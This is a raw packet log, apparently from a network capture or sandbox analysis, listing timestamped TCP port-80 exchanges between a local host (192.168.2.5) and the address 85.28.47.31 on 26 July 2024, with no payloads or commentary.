Jul 26, 2024 17:56:13.109776974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109791040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109812021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109823942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109846115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109860897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109883070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109896898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109915018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.109942913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.109966040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.110891104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.110927105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.110958099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.110961914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.110976934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111011028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111026049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111046076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111062050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111079931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111097097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111114979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111129045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111149073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111161947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111185074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111212969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111218929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111228943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111270905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111341000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111375093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111390114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111407042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111418009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111440897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111449957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111474991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111490965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111507893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111521006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111542940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111557007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111576080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111588955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111609936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111624956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111644030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.111654043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.111694098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112250090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112301111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112303972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112334967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112356901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112368107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112382889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112401962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112416983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112437010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112449884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112471104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112504005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112513065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112552881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112586975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112597942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112631083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.112639904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.112684011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113311052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113347054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113358974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113379955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113390923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113414049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113424063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113446951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113456011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113481045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113487959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113509893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113523006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113543034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113552094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113578081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113588095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113615990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.113627911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.113656044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114108086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114144087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114165068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114201069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114244938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114279985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114294052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114312887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114329100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114347935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114373922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114387035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114403009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114420891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114428043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114454985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114475965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114487886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.114512920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.114537954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115190983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115205050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115216017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115227938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115236998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115238905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115251064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115261078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115262985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115273952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115284920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115297079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.115297079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115320921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115341902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.115988970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116002083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116014957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116025925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116035938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116038084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116048098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116059065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116060019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116070986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116084099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116096020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116101980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116106987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116118908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116123915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116128922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.116141081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116158009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.116185904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.117053032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.117064953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.117075920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.117088079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.117104053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.117153883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157346010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157387972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157399893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157440901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157526016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157597065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157608986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157622099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157634020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157648087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157687902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157851934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157862902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157875061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157886028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157896042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157896996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157908916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157917023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157918930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.157963991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.157983065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.183970928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184005022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184015989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184050083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.184106112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.184520006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184533119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184544086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184561968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184571028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.184576035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184586048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184597969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184602022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.184609890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184622049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.184655905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.184684038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185086966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185100079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185112000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185123920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185139894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185149908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185151100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185149908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185163021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185170889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185173988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185187101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185197115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185200930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185209990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.185216904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185239077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.185261965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.186831951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186849117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186906099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.186920881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186933994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186944008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186943054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.186949968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186960936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186968088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.186973095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186985016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.186992884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.186996937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187007904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187021017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187037945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187060118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187073946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187079906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187099934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187133074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187158108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187169075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187174082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187180042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187185049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187192917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187202930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.187211037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187232971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.187263966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.226267099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.231161118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405447006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405495882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405507088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405600071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.405644894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405648947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.405657053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405673981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405687094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405687094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.405719995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.405767918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.405916929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.405965090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406058073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406075001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406085968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406095028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406096935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406111002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406119108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406121016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406132936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406145096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406153917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406156063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406183958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406213045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406779051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406790972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406800985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406812906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406824112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406835079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406838894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406847000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406857967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406867981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406879902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406883001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406891108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406902075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406903982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406913042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.406925917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.406953096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407705069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407716990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407727003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407738924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407748938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407759905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407768965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407771111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407784939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407785892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407794952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407807112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407812119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407819033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407829046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407830954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407843113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.407855988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407874107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.407898903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408654928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408667088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408677101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408689022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408699989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408711910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408716917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408721924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408732891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408739090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408745050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408767939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408770084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408780098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408791065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408799887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408802986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408813953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.408814907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408844948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.408879995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409578085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409590006 CEST	80	49704	85.28.47.31	192.168.2.5
